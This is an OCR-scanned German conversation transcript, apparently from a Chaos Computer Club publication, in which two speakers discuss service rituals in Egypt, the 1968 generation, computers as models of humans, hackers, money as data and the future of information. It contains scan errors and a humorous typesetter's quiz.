Ausland warst.
m: Wieso?
p- Da tun sie einem immer so kleine Zärtlich¬
keiten an. Das ist, man schämt sich hier in
Europa ja fast, Dienstleistungen zu genießen.
Wenn du in einem Restaurant sitzt - was hier
sowieso nur in extram seltenen Fällen passiert
-, und das Gefühl hast, daß du gut bedient wirst,
das ist einfach ein Gefühl. Das ist wie eine
Zärtlichkeit. Wenn jemand edel, mit genau der
richtigen Dosis aus Zurückhaltung und einer in
Jahrhunderten herangereiften Kunst, Leute zu
bedienen und jemandem in kleiner Weise was
Gutes zu tun. . . Du kannst hier kaum über
sowas sprechen, ohne daß die Leute auf dich
einschlagen als Reaktionär. Imperialist, Kolo¬
nialherr oder so. Es ist immer noch ein Denk¬
tabu auf dieser Emotion, vor allem deshalb
auch, weil sie bei uns eh so selten ist. Es ist
sozusagen schon mit Unlust verbunden, sich
bedienen zu lassen. Das ist irgendwie peinlich.
Und wie’s mir in Ägypten gegangen ist; Du
bestellst bei einem netten Nubier in einer Bar
einen Gin Tonic. Dann kommt der mit dem Glas,
und du merkst an seinem Gesichtsausdruck: es
ist jetzt eine ernste Frage, wieviele Würfel Eis
man in einen Gin Tonic reintun soll. Es ist ein
Problem, das man abergemeinsam bewältigen
wird. Das hat einen gewissen Ernst, weil: Das
ist nun dieser Augenblick. Und in diesem Au¬
genblick geht's darum, wie viele Würfel Eis in
den Gin Tonic sollen. Und er hilft dir dabei,
genau auf die richtige Art und Weise. Bringt
dann die Eiswürfel in den Glas unter, schüttet
das Tonic rein und holt dann noch unter seiner
blauen Galabeja einen uralten Suppenlöffel
raus und rührt, und auf eine ganz gemessene
Art und Weise versetzt er das ganze in Be¬
wegung, vermischtdie Stoffe, stellt dirdas dann
hin, lächelt dich an, hat seine Arbeit gut getan,
merkt, du bist zufrieden, es geht dir gut und
schwebt wieder weg. Das kost’ nix, wunderbar.
Das ist Lebensqualität. Wenn sie einen
Aschenbecher ausleeren - eine Zeremonie.
Eine Mini-Zeremonie, aber wunderbar. Plötz¬
lich taucht ein Kellner hinter dir auf, und der hat
einen leeren sauberen Glasaschenbecher.
Dann legt erden verkehrtrum über den schmut¬
zigen drüber, macht eine Muschel daraus, das
klingelt dann ein bißchen. Und du wirst schon
aufmerksam. Interessant, da geht was vor sich
Dann verschwindet er hinter deinem Rücken
mit dieser Muschel in der Hand und taucht dann
mit dem sauberen Aschenbecher wieder auf
und stellt den hin. Ein kleines Ritual, aber wun¬
derbar. Die ganze Zeit solche Geschichten.
(Das Aufnahmegerät streikt)
p; Der Walkman will nicht. Die Maschine ist
mein Freund, verstehst du. Er macht’s mir
schwer, unsere heißen Gespräche aufzu¬
zeichnen. Erwin nicht, daß das BKA kommt und
die Bänder mitnimmt.
m: Dieses schlechte Gewissen Dienstleistung
gegenüber. Ich glaube, daß diese Generation
bis 1960 das schlechte Gewissen nicht hat. Das
sind die ’68er. Das ist diese Generation, die
Unken.
p; Das ist doch die Scheiße, Mike. Wir müssen
uns für die jetzt den Kopf zerbrechen. Die
dummen Hunde hängen herum.
m: Ja, aber jetzt noch ein Stück weiter: ich
glaube, daß die Generation von Leuten über-
haupt keine Bedenken mehr hat in der Rich¬
tung, sondern auf alle Reize reagiert, weil sie
einfach nichts Befriedigendes hat.
p; Die haben jetzt ein mörderisches Nachhol¬
bedürfnis. Warst du mal dort, wo ich mit dem
Fotomodell gewohnt hab? Ganz feudale Woh¬
nung.
m; War ich einmal.
p: Da... tack. Schwarzes Loch. Gib mir mal nen
Tip, was ich grade sagen wollte.
m: Da in dieser Wohnung. ..
p: Da in dieser Wohnung, da war was...
m; Dieses mörderische Nachholbedürfnis.
p: Jaa, tack. Danke. Und zwar, da haben wir
Nachbarn gehabt, das waren wie von Seyfried
gezeichnet so Alt-68er. Er war Architekt, saß
immergrummelnd vorseinem PC herum. Hatte
immer Nadelstreif-Latzhosen an, so ziemlich
das Ungustiöseste, wasich mir vorstellen kann.
Und beide hatten den Ausdruck von jahrelan¬
gem schweren Frust im Gesicht. Da ist mir
einfach klargeworden, auch wie sie sich mir
gegenüber verhalten haben, uns als Nachbarn
gegenüber, daß die ein unheimliches Nach¬
holbedürfnis an Spießigkeit haben. Weil das
was war, wogegen sie sich wohl die ganze Zeit
wie wild abgegrenzt haben ein Jahrzehnt lang,
wogegen sie sich gestemmt haben, und da ist
ihnen jetzt der Saft ausgegangen. Oder sie
haben nachgelassen und jetzt schlägt es durch.
m: Es ist ja kein Geheimnis, daß die Bürokraten
die faulsten Menschen überhaupt sind und sich
zu neunzig Prozent aus diesen Leuten rekru¬
tieren, auch aus dem Verantwortungslosig¬
keitsprinzip.
p: Was Arbeit angeht, da hab ich in Ägypten ein
menschliches Perpetuum Mobile gesehen. Das
war herrlich. In einem der schönsten Bauwerke
der Welt, in dem Taltempel der Hatschepsut in
Dar-el-Bahri. Da bin ich den ganzen Nach¬
mittag nurdort gesessen und war sprachlos. Da
wird an der obersten Tempelstufe restauriert,
ein polnisch-Ägyptisches Gemeinschaftspro¬
jekt. Und dieser Taltempel, der ist in eine herr¬
liche Kulisse reingebaut. Steht da vor Pla¬
teaubergen, Treppen, die sich aus den Bergen
vor dem fruchtbaren Land in die Landschaft
ergießen, herrlich. Dahinter-das ist in so eine
milde Schale aus Bergen eingefaßt - steigen so
Schutthänge zu den Steilwänden hoch. Einer
von den Schutthängen reichte bis zu dem Rand
von dem Tempel, wo sie grade renoviert haben.
Da saß einer ziemlich weit unten und hat aus
der Halde immer Steine rausgesucht, aber mit
Überlegung, der hat selektiert nach - man
möchte fast meinen; ästhetischen Prinzipien.
Hat immer Steine von einer gewissen Hand¬
lichkeit, oder von einem bestimmten Gewicht
rausgesucht, meinte ich zu beobachten. Hat die
in eine Schubkarre gelegt, und wenn die Karre
voll war, kam einer von hinten - da haben sie
sich so einen kleinen Pfad gemacht in der
Schutthalde - und fuhr damit zehn Meter nach
hinten. Da haben sie ein dreigeschossiges Ge¬
rüst aufgebaut, Stahlrohrkonstruktion, wildest.
Da ging, über drei Ebenen verschoben, bis auf
die erste und zweite Ebene ein Flaschenzug,
und da haben sie dann die Schubkarre einge¬
klinkt und hochgezogen und ein Meterchen
rübergefahren zum nächsten Flaschenzug von
der zweiten auf die dritte Ebene. Da stand dann
wieder einer und hat das hochgezogen. Dann
stand die Schubkarre also oben. Dann kam
wieder einer, der mit der Schubkarre dann oben
so einen kleinen Pfad, den sie gemacht haben,
wieder die Richtung zurückfuhr und die Steine
aus der Schubkarre die Halde runtergeschüttet
hat. Und die Steine sind dann wieder ungefähr
dort hingekollert, wo der Mann saß, der immer
die Steine sortierte. Und das hab ich mir immer
wieder den Nachmittag hindurch angeschaut.
Ich weiß nicht, ich glaub das machen die seit
5000 Jahren. Da sitzen die dort, nurdas Gerüst
haben sie jetzt neu gekriegt, und tragen die
Steine im Kreis herurn. Es ist unglaublich. Ich
weiß auch, warum die Ägypter so müde sind. So
nachlässig und faul manchmal. Die sind immer
noch müde vom Pyramidenbauen. Die versu¬
chen seit 4000 Jahren, sich zu erholen. Das
muß eine derartige Schufterei gewesen sein.
Mumford hat ja gesagt, das war die erste Ma-
schine, die Menschenstruktur beim Pyrami¬
denbau. (..)
radikal die auch sind. In dem Augenblick, in dem
du militärische Aktionen machst, verläßt du den
Freiraum.
m- Stellvertreterkultur: In gewissen Kulturen
kommst du wieder zu dem sozialen Code, uer
soziale Code, der eine Investition aller ist. Die
Motivation, oder die Art und Weise, wie es
nassiert ist im Grunde genommen vollkommen
S öder unterschiedlich. Ob das Jetö ein
Gebet ist oder eine Steuerzahlung. Nicht Kom
munikation, das unterscheidet sich insofern: Es
qibt im französischen den Ausdruck Lac de
nratuit. Das Geschenk, Shestus in Indien, wo
die Leute hingehen, wenn sie nichts ^u ^ssen
haben und Essen vor die Götterstatue stellen.
Oderim Mittelalter werden riesige Kirchen, Do¬
me gebaut, mitten in der Landschaft, wo die
Leute nebendran in irgendwelchen Hutten pen¬
nen und leben und kaum was zu essen haben,
und aber in diesem Dom nichtmal 'eben, was ja
fürden heutigen Begriff von Leben, Loft, Besser
Wohnen. . . heute hat jeder im Kopf. Ich bin
Pharao, ich möchte leben wie ein Gott.
d: Hab’ ich vorhin doch gesagt: Die Aristokratie
kommt wieder. Jeder ist ein König, jeder ist ein
Pharao. Du hast deine Sklaven am Schreibtisch
stehen. Du hast deinen Computer.
m-Aber die Funktion der Aristokratie war in den
letzten 200, 300 Jahren was anderes, namhch
die Garantie für diesen Freiraum, für kultur^le
Verfeinerungen, für Basis, vyenn bas Geld nicht
da war, wenn die Möglichkeiten i^'^bt da waren,
die Leute nichts zu essen hatten, die yolks¬
suppe. Oder die reichen Leute, die einfach
soundsoviele Leute mitgefüttert halDen, oder
die Organisation von Volksfesten, die Organi¬
sation oder Mitfinanzierung von gewissen so¬
zialen Freiräumen, wo die Aristokratie biesen
Großmut und diese Geschichte übernommen
hat. Als Gegenbeispiel des l^ulturellen Pro¬
blems heute: Mietet sich ein Mensch eine Wo^
nung und nimmt sie nicht, weil ersagt. Ich nehm
lieber eine Dreizimmerwohnung, weil da ist
sonst ein Zimmer zu viel, oder bas muß ja
wenigstens ein Gästezimmer sein oder eine
Funktion haben. Also eine Wohnung zu mieten
in der ein Zimmer vollkommen frei besteht, das
existiert fast nicht.
p: Du bistdirdarüberim klaren, was du sagst mit
deinen Freiräumen? Daßdas letztlich bedeutet,
daß der größte verallgemeinerbare Freiraum
der ist der uns vom Militär freigehalten wird.
Nämlich der Freiraum, den man so Zivilisation
nennt der zivile Bereich. Das, wo du Zivilist sein
kannst, wo du ohne Kampfhandlungen deine
Socken kriegst, deine restlichen sozialen Akti¬
vitäten abwickeln kannst, wie weit die oder wie
m- Hat gar nix damit zu tun. Militärischer Frei-
raum, das Exempel gefällt mir nicht so..
p- Wieso nicht? Ich finde manchesmal militäri¬
sche Denkmodelle interessant. Wenn ich mir
eine Landschaft anschaue, frag ich mich
manchmal, wie wohl ein General die Land¬
schaft sieht. Ich schau mit dem ästhetischen
Auge drauf, und der General zieht seine Ver-
sorgungslinien und Vormarschlinien durch,
egal ob da ein Haus steht oder ein Flu ß ist. Der
sagt: die Panzer fahren da durch, und die fah¬
ren in einem geraden Strich da durch. Das ist
wie beim Landvermessen.
m: Das ist aber jetzt eine andere Geschichte.
Du gehst vom General aus, du hast jetzt wieder
das mit den Pharaonen etwas falsch verstan¬
den, vielleicht wieder von mir nicht richtig er¬
klärt. Mir geht es immer noch um den sozialen
Code. Ein sozialer Code ist ein gemeinsames
Gefühl von gemeinsam investieren, das ist eine
Geschichte. Muß es aber nicht sein. Aber so
eine Geschichte kann auch eine funktionsfreie
Kommunikationsebene sein. Das Erste ist eine
Ruhe, die Gedanken in einem Raum sind, will
nicht sagen: frei, aberwenn ich dran denke, daß
ich in zwei Stunden, drei, fünf Stunden was zu
tun habe, sind meine Gedanken von der Kon¬
zentration im Grunde genommen schon woan¬
ders. Irgendwo ist da ein Warteprogramm, ob
Kaffeekochen oder egal was. Wenn ich aber
hingehe und z.B. - Thailand, das System der
buddhistischen Klöster, wo jeder Thailänder —
das ist in Nepal ebenso -, einmal in seinem
Leben in dieses Kloster reingeht und, als so¬
ziale Verantwortung getarnt: ich muß was für
Buddha undsoweiter tun, aber im Grund jede
soziale Verantwortung auch wieder abgibt, in
dieses Kloster reingeht. Geht auch Axel Sprin¬
ger, drei Wochen wird er zum Mönch. Und Axel
Springer gerät in ein anderes System ohne
einen Freiraum, wo er morgens um 6 aufstehen
muß, vollkommen demokratisch, alle den Kopf
rasiert undsoweiter, und auf die Straße gehen
muß und seinen Reis betteln muß. Vollkommen
gleich behandelt. Also Axel Springer, stell dir
vor, geht hier ins Trapistenkloster. Was kriegt
er?’Er kriegt erstmal eine separate Kapelle, er
kriegt einen Fernseher in die Zelle, Privileg,
geschichte. Ich erklär’ das Problem, daß diese
Gleichheit, diese Demut in diesem zwar vor¬
gegebene Konzept, wo jeder weiß, daß es
abstrakt ist, akzeptiert wird und als sozialer
Code gesellschaftlich. Jeder ist durch diese
Demut durchgegangen. Frau wie Mann. Und
4
diese Geschichte - diese Systeme von Frei¬
raum - ist in jeder Kultur nötig.
p: Ich hab’ dir schon vorhin erzählt-da hab’ ich
vielleicht dieses Wort nicht gebraucht wie ich
die Geschichte der Hand beschrieben habe, die
ich am Computer zu konstruieren versucht ha¬
be. Da entsteht sowas wie Demut. Nämlich
angesichts dessen, was die Maschine nicht
kann. Das wird für mich ein Negativabgleich.
Die Maschine ist kein Mensch, mit dem ich das
gleiche Erlebnis hab’, aberdie Maschine ist ein
Modell vom Menschen. Ich habe neulich in
einer Diskussion selber eingeworfen, wenn
man schon versucht, immer perfektere Modelle
vom Menschen zu konstruieren - also die Idee
weitergedacht - im Computer, warum nimmt
man da nicht gleich lebendige Menschen. Das
ist sozusagen das Perfekteste, was es in der
Bauserie im Augenblick gibt. Da, hat Vic ge¬
sagt, kannst du z.B. nicht an beliebiger Stelle
Prozesse unterbrechen, das Ding aufmachen,
reingehen und an jeder beliebigen Stelle Zu¬
stände ablesen.
m; Das war aber möglich. Das ist in Kulturen
möglich gewesen, wo z.B. in gewissen religiö¬
sen Ritualen Medien und Material waren. Skla¬
ven eines Konzeptes, genauso wie die Pyra¬
miden. Klar wird das negativ gewertet, wenn
man sagt: Der Mensch als Maschine, oder als
Teil der Maschine. Aber in so einer Geschichte
ist natürlich als Gemeinsamkeit ein Teil von so
einer Geschichte zu sehen. Ist natürlich ein
Erlebnis, wo irgendwelche Massengefühle
erstmal. . . braucht man eine Maschine, um
einen Menschen zu simulieren. Eins. Und zwar
ist das intellektuelle Niveau dermaßen Kom¬
munikation, two ways, so verdammt reduziert.
Und das gleiche ist mit dem Fernsehen. Und auf
dem dritten Level kann man sagen: Daß zum
Beispiel das Allerhöchste an Qualität, von Mas¬
senveranstaltungen oder von Massengefühi,
ist leider Gottes Fußball, oder Olympia-Eröff¬
nung, war nicht schlecht.
p: Wieso leider Gottes? Fu ßball ist auch so eine
Sache wie Computer, die alle Menschen aus
verschiedenen - oft männlichen Geschlechts -
ideologischen und philosophischen Bereichen
verbindet.
Säzzer-Quiz:
Wieviel Prozent des gedruckten Textes sind von Eva gesprochen worden?
(Zur Erinnerung: Am Gespräch haben zwei Männer und eine Frau teilgenommen.)
O 33% (Quote) O 5% 0 1% O 5%o
Die Person, die die falsche Lösung bis gestern an den Chaos Computer Club einsendet, gewinnt
eine Jahresabonnement einer feministischen Zeitschrift. ,_
i
p; Wieso leiderGottes? Fußball ist auch so eine
Sache wie Computer, die alle Menschen aus
verschiedenen-oft männlichen Geschlechts-
ideologischen und philosophischen Bereichen
verbindet.
m: Es geht jetzt um die Synchronisation von
Gefühlen. Um Code. Um Sprache. Sozialer
Code nenne ich jetzt eine Sprache auf einem
anderen. . .
p:.. .Das sind ja auch Gegenbilder, Fußballund
Computer. Auf der einen Seite hast du ein
Massenzeremoniell. Auf der anderen Seite hast
du mit dem Computer - ich hab das hier noch
unterstrichen durch meine Pharaonen am
Schreibtisch, und balinesische Tempeldämo¬
nen -, dann seh ich manchmal einen Tischaltar
vor mir stehen. Von der Form her, und von dem
her, was ich daran tue. Ich vollziehe mein täg¬
liches Ritual an diesem kleinen Hausaltar. Das
ist wiedermal eines von diesen vielen Modellen,
die du überden Computer denken kannst. Da
kann ich z.B. auch ein Bild machen, wenn ich
sage: Ich kann mich manchmal in der Vorstel¬
lung in Merlin, den Magier verwandeln. Auch
bloß mit einer gewissen kleinen Formverän¬
derung im Design des Instrumentariums. Statt
der Kristallkugel steht da der Bildschirm.
m: Das ist jetzt alles noch im Bereich der Un¬
terhaltung.
p: Nein, da kommen tatsächlich verbindliche
Informationen raus. Dinge, die ich über mich
selbst und über die Welt erkennen kann.
m: Das find ich jetzt interessant. Was sind
“verbindliche Informationen“?
p: Ich habvorhindiesesganzplumpe Modell mit
Information und Unterhaltung gemacht. Und
verbindliche Informationen, das sind für mich
die, auf die ich reagiere und zwar mit meinem
Gefühl. Als erstes. Das ist sozusagen die erste
Anzeige, wenn sich da im Gefühl irgendwas tut,
dann wird eine Information interessant. Dann
fang ich an, im Kopf nochmal zu überprüfen, ob
die für mich verbindlich sein kann oder ist. Dann
treffe ich die Entscheidung. Alles andere geht
nur durch. Durchlauferhitzer. Das ist Unter¬
haltung. Vorne rein, hinten raus. Da bleibt na¬
türlich manches hängen, das mischt sich.
m: Ja, da bleibt einiges hängen. Es ist halt die
Frage, was hängenbleibt. Jetzt nicht negativ
gewertet.
p: Muster. Muster bleiben hängen. Das ist z.B.
was, was du am Computer auch sehr gut lernst:
Muster zu erkennen. Daß das eigentlich eine
wahnsinnig interessante Sache ist. Ganz wert¬
frei: Muster und Strukturen siehst du, wo du
vorher noch nichts gesehen hast. Und kannst
dadurch bestimmte Dinge wieder besser in die
Hand nehmen, besser denken oder machen
m: Ich will jetzt vom Computer wieder wea-
kommen. Ich find diese Geschichte, immer wie¬
der auf den Computer, nicht ganz so wichtig
p: Du bist aberauch seiberschuld, du hast mich
jetzt so angekurbelt. Da fallen mir dauernd
irgendwelche Sachen ein.
m: Ich will das auch nicht negativ sehen, ich
meine einfach, daß es um die Frage geht in
unserem Brainstorming, Computer als Modell
als bewußtseinserweiternde Geschichte dip
hab ich hierauch Psycho-Hacking genannt dip
Feuer-Geschichte, andererseits die Qo
schichte mit der Hand, und dann auch ModellP
durchprobieren, die man eigentlich mit Men
sehen auch machen “könnte“. Und so praktisrh
die ganze Geschichte des Computers als men
Schliches Testprogramm machen, wieso nioht
mit Menschen, wie du auch. . . ^
p: Weißt du, was ich dir sage: Du kannst e.. u
einen negativen Aspekt daraus machen wo ”
du sagst: Wieso nicht mit Menschen? DercS^'^
puter hat eine Eigenschaft, die man ihm sch '
gut anrechnen kann: Er ist unendlich tolerant.
Du kannst einen Fehler tausendmal hinterein¬
ander machen, er wird dich mit unendlichem
Gleichmut immer weiter deinen Blödsinn ma¬
chen lassen, so lange, bis du’s vielleicht selber.
. . Er macht dich drauf aufmerksam im Ex¬
tremfall, daß du einen Fehler gemacht hast, er
gibt dir eine Zustandsmeldung.. .
m: Es geht ja nicht um Fehler, um Technik. Es
geht um Philosophie. Du kannst grundsätzlich
jede Situation durchsimulieren. Fast jede.
Theoretisch kannst du Auschwitz nachsimu¬
lieren. Gibt’s ja schon Computergames.
p: Das ist nicht, was ich unter Simulation ver¬
stehe.
m: Das ist reine Simulation. Ich treibe es jetzt ein
Stück weiter, ich gehe auf die Grasmuck—
Theorie zurück: Arbeit als Philosophie ist in der
Dekadenz. Arbeit als Identifikation existiert
kaum noch, es sei denn, es hat direkt mit
Unterhaltung zu tun. Die Leute gehen im
Westen doch den Weg des geringsten Wider¬
standes, d.h., die Werte einer Arbeit werden mit
Unterhaltung oder einer Lebensqualität gleich¬
gesetzt, ob es jetzt Geld ist oder...
p:.. .oder mit Forschung. Ich mu ß leider schon
wiederden Computer erwähnen. Und zwar, wir
haben so einen Zustand, in dem du eigentlich
meinen könntest: die Welt ist entdeckt. Und es
geht nur noch um ein paar unwesentliche De¬
tails, z.B. darum, was eine halbe Sekunde vor
dem ausgebrochenen Urknall passiert ist.
genau am Anfang. Was ab der halben Sekunde
danach passiert ist, wissen die theoretischen
Physiker schon. Du kannst nicht mehr, so wie
im 18. oder 19. Jahrhundert noch das Allge¬
meinwissen deiner Zeit als ein Mann überblic¬
ken. Man wird so verunsichert. Du wirst klein¬
gemacht durch das Gefühl: du kannst als Ein¬
zelperson gar nichts mehr entdecken, nichts
mehr erforschen. Du brauchst mindestens
einen Teilchenbeschleuniger, Großtechnolo¬
gie, Kernresonanzspektrometer, Computerto¬
mographen, diese ganzen teuren, riesigen Din¬
ger. Oder Spezialistenteams, die sich vorher
schon 20 Jahre auf der Uni das Hirn ausge¬
rissen haben. So. Und dann kommt plötzlich
genau ausdem Sektorso eine kleine Maschine,
der Computer, der in einem Jahrzehnt eine
Leistungsfähigkeit erreicht, sodaß du eben,
was grade noch in einem Rechenzentrum an
Leistung rumstand vordreivier Jahren, plötzlich
auf deinem Schreibtisch steht. Und du hast die
Möglichkeit, damit zu forschen, zu arbeiten, als
Einzelner, als privater Mann..
m: Gut, aber es interessiert niemanden mehr
außer dir selber, diese Forschung.
p: Das stimmt überhaupt nicht. Da muß ich
bitteschön auf die Hacker hinweisen, als klei¬
nes Beispiel. . .
m: Du kannst die Hacker als die ewige Reak¬
tionsgeschichte, Kontrollinstanz, nicht immer
wieder als Inhalt aufführen.
p: Das ist ein Inhalt, der ist akut. Es gibt be¬
stimmte Inhalte, die sind zu bestimmten Zeiten
der Geschichte akut, da. Dann verschwinden
sie wieder und andere sind dran.
m: Die Hacker sind allerhöchstens eine Avant¬
garde und eine reaktive Kontrollinstanz, die
inhaltlich an einer Philosophie nicht mitarbei-
ten, sondern nur, indem sie Grenzbereiche
schaffen, wo gewisse Machtwerte infrage ge¬
stellt werden, interessant sind. Sie sind Friktion,
sie pushen etwas. Sie pushen gewisse Macht¬
kompetenzen, die einerseits fast vollkommen
unumschränkt von gewissen Leuten gemacht
werden, ob jetzt Information, Wissenschaft
oder andere, und pieksen da mal rein. Und dann
perfektioniert sich die Geschichte. Das ist
nichts anderes, zurzeit. Es ist keine Vision bei
diesen Leuten da, es ist nur Unterhaltung, oder
computergamemäßig Forschung zu machen.
Probieren, tüfteln, reagieren, Squash spielen,
sonst nichts. An dem Punkt sind wir jetzt schon
lange angelangt. Und du kannst nicht immer
wieder die Maschine.. . und das passiert, und
das passiert. Arbeit, sicher, Arbeit ist alles. Aber
es gibt "Beschäftigung“ und “Arbeit“, und da ist
ein Unterschied, Und das ist Beschäftigung,
was diese Leute machen. Inhaltlich leben sie
vielleicht nach drei,vier Jahren davon, unab¬
sichtlich, als riesige Software-Spezialisten
oder Hardware-Spezialisten, engagiert in
einem Bereich, wo sie gar nicht wissen, wo sie
sind. Wo sie sich nie 'mit identifiziert haben,
außer mit einer Technikgeilheit. Oder eben die¬
sen zwei Gründen. Und was anderes nicht.
p: Da triffst du jetzt wiedereinen wunden Punkt.
Da bin ich mit meiner Arbeitsrichtung auf einer
Insel, weil das tatsächlich im Augenblick ein
aktuelles Problemteiichen ist. Weil viele von
den Hackern so in ein Alter kommen, wo sie an
Existenzgründung denken...
m:.. .denken müssen...
p: . . .Ja, und im Augenblick sich die merk¬
würdigsten Dinge abspielen. Es entstehen
Konkurrenzen zwischen Leuten, die vorher
traulich im Schulterschluß mit Selbstverständ¬
lichkeit ihren Spaß gehabt haben, gearbeitet
I
haben qelorscht haben, ohne daß von Geld
auch nu?die Rede war. Und
ein paar von ihnen mit einer sehr ah^nlichen Idee
zwei Läden aut, Firma. Plötzlich ist da em
gewisser Frost zu bemerken, Kommunika¬
tionssperre. Dinge werden vertraulich behan¬
delt. Da schleicht die Paranoia herum.
m- Das ist ja wieder; Da wird eine Geschichte,
die mal Spaß war, zu Geld und dam wirds
komisch für die Leute. Und da gibt es überhaupt
keine inhaltliche Diskussion, wofür, für was,
überhaupt nichts. Vorbei.
p; Das geht ja. Ich hab ja auch das, was mir
Spaß macht, zu meinem Beruf gemacht. Ich bin
Berufskind - in sorgfältiger Unterscheidung zu
dem Begriff Berufsjugendlicher..
hab’ ich nur ein ganz schwaches Verhältnis
dazu. Ich bin froh, wenn ich eine Freundin hab,
die meine Kassa verwaltet, so eine kleine Yoko
Ono.
m: Es geht jetzt nicht um Geld, sondern was
sich gesellschaftlich dann ändert.
p- Ja, ich mach mir auch in der Folge um die
weiteren Geldstrukturen keine Gedanken.
m: Es geht jetzt nicht um die Geldstrukturen,
sondern darum, daß die Informationsgesell¬
schaft mit sich bringt, daß eine gewisse.. .
p; Das wird ja auch vereinheitlicht. Das war ja
eines der ersten Dinge, die digitalisiert worden
sind. Geld fließt doch auch nur noch in Form von
Datenströmen.
m:
. .Berufsjugendlicher, Berufsromantiker.
p; Nein, ich bin KEIN Berufsjugendlicher. Ich bin
Berufskind. Ich kann es mir endlich erlauben, in
Ruhe fertigzuspielen. Es gibt einen schonen
Satz von Nietzsche, der hat mal gesagt. Man
muß als Mann den Ernst wiederfinden, den man
als Kind beim Spielen hatte. Das schreib ich mir
ins Wappen - falls ich mir mal eines zulegen
sollte.
m; Ich gehe trotzdem weiter. Seit einer Stunde
will ich diesen Satz zuende sagen.
p: Du bist immer noch nicht dazu Gekommen,
die Grasmuck-Theorie auszufuhren. Aber ich
bin immer noch mit dabei, Mike.
m: Ja, gut. Und diese Geschichte von - ich
wiederhole es jetzt - daß 1/5 der
4/5 der anderen durchziehen konnte. VVas heißt
das jetzt materiell gesehen? Daß in einer Ge¬
sellschaft, in der 1/5 arbeitet, em moneta es
System... Stell dir vor, 1/5 der Leute, die alles
produziert, zahlt 4/5 der
nicht arbeiten-ich sage nicht, daß sie sich nicht
beschäftigen -, also, die nicht arlDeiten in die¬
sem Sinne, zahlen denen Material, damit sie
sich was kaufen können, was essen. . . v^e
funktioniert das? Wie wird das entschieden.
Was ändert sich gesellschaftlich, wen^n dieses
monetäre System, das bisher jahrhunc^rtelang
funktioniert hat, nicht mehr ^^'stiert. Oder. Es
ist doch vollkommen abstrus oder dekadent,
wenn 1/5 der Leute, sozialgeldmäßig namlich,
4/5 der Leute bezahlt, damit sie ihnen dem 1/5,
was abkaufen, egal ob man da ein Turnussy¬
stem oder irgendwas anderes macht.
D-Geldist eine Sache, überdie mach ich mirviel
zu wenig Gedanken. Da hast du eh recht. Da
m; Ja, aber das ist vielleicht umverteilbar. . .
p: . . .und die Datenströme erreichen zwi¬
schendurch Realitätsgrade bis hin zu dem Bör¬
senkollaps. Das ist ja auch eines von den
neuen, ganz großen Videospielen. Die inter¬
nationale Börse.
m: Das ist auch ein Videospiel, das sich als
Videospiel degradieren wird. Was heißt: In Zu¬
kunft werden gewisse Informationen mit der
gleichen Qualität, oder mit dem gleichen Wert,
behandelt werden wie Geld. Und das werden
irgendwelche wichtigen Informationen sein,
von.. .
p: Ja, eine Hyper-Abstraktion. Ist ja Geld schon
eine Abstraktion von realem Wert. Ob du jetzt
ins Spielcasino gehst und einen Jeton kriegst
der eine zweite Abstraktion von Wert ist, oder
ob du digitales Geld nimmst, oder Banküber¬
weisungen, wo nur noch Ziffern hinundherflut-
schen, das ist schnurz. Das ist dasselbe.
m: Ich meine jetzt, der letzte Imperialismus -
was ich meinte mit dem Westen. Wir zahlen
eine Monopolisierung des Informationswertes
Es wird ein Monopol. Nur wird es dann sehr-
lustig, weil das Gremium aus einer Demokratie
von Werten bestehen wird, die einfach so per¬
vers und so krank und so durcheinander sein
werden, daß es wieder als Übergangsphase -
ich schätze so in 20,30 Jahren - eine Mischung
von Grünen bis Linksradikalen bis Porno--
Leuten bis Politik... - wird alles gemischt sein
Und da wird ein Cocktail zusammengestellt vori
Informationen, was was wert ist, und es wird -
deine Einblendung von lnformations-Naviga_
toren -, es werden Leute sehr gut bezahlt
werden, daß sie die richtigen Informationen an
den richtigen Ort bringen. Und das werden die gewisse Leute. . .
Leute sein, die gewisse Geschichten kontrol¬
lieren werden. p:.. .wie Fernsehprogramm. . .
p: Dieser Beruf vom Navigator, der ist ja in der
Vorstellung auch schon mit einem gewissen
Optimismus ausgestattet. Weil, es gibt eine
andere Perspektive, wenn du dir die Entwick¬
lungen in den Datenbanken momentan an¬
schaust: Da ist immer die Verheißung, das
Wissen der Menschheit steht uns zu Verfü¬
gung. Die Realität ist aber das exakte Gegen¬
teil. D.h. es wird das Wissen der Menschheit
vergraben und versteckt, halt nicht mehr in
Löchern, Höhlen und Truhen oder lateinischen
Übersetzungen, sondern in Datenbanken. Du
hast eine ganz klare ökonomische Barriere, d.h.
das Monatsabonnement für eine Datenbank,
sagen wir über die geologische Struktur Un¬
teritaliens, geht im Schnitt bei 100 Mark im
Monat los, aufwärts. Das sind alles Fachda¬
tenbanken. hunderte. Etwas ungeregeltere und
freie Formen von Informationsaufnahme wie
z.B. durch ein Buch schlendern oder durch¬
blättern, schmökern, kreuz&querlesen usw.,
das fällt schon mal weg. Wieder eine Verrohung
der Informationsaufnahme. Und dann gibts
noch die Sperre: du kommst an Datenbaken
nicht ran, wenn du das Knowhow nicht hast -
da käme dann wieder der Navigator zum Ein¬
satz -, wenn der überhaupt noch zum Einsatz
kommt. Weil: Wenn das so weitergeht, wenn ich
jetzt mal ausnahmsweise auch schwarz malen
darf, kann es durchaus sein - wenn du nicht
mehr WEISST, was es zu wissen gibt, dann
kanst du es auch nicht suchen und schon gar
nicht finden. D.h., das Prinzip der humansiti-
schen Bildung oder der klassischen Allge¬
meinbildung. ..
m: Da wird es zwei Versionen geben. Entweder
man nimmt, was kommt, oder es werden sich
m: . . .fernsehprogrammäßig meinungsmäßig
aufbauen, die sagen: Das und das ist wichtig.
Aber ich glaube, daß noch ein anderer Punkt
wichtig ist, rein von der Gesdellschaftsstruktur
her, wenn man jetzt z.B. die BKA-Geschichte
anguckt, diese total hilflosen Polizisten, und
andererseits die total hilflosen Hacker. Und
dann gibt’s Leute wie mich, oder andere Leute
- ich werd’ von diesen Leuten schon ziemlich
gut behandelt. Ob es jetzt die Hacker sind, oder
die Musikszene, odervon gewissen Leuten aus
der Kunstszene, einfach aus dem Grund, da ich
jetzt schon in einem gewissen Sinn eine phi¬
losophische Navigator-Funktion habe.
p: Klar, wir haben doch alle schon an deinem
Mythos mitgearbeitet, Mike. Du hast eine Ver¬
pflichtung.
m: Das ist schon klar, daß ich eine Verpflichtung
hab’. Ich hab’ von Anfang an auch sehr bewu ßt
gesehen, daß ich diese Verpflichtung hab’ und
auch haben will. Jetzt natürlich: die Gefahr ist,
daß ich irgendwann gedacht hab, ich helfe
dabei. Aber ich hab’ mich nie damit abfinden
können und fühl mich sehr schlecht dabei, daß
jetzt die Leute sich drauf verlassen: Der wird
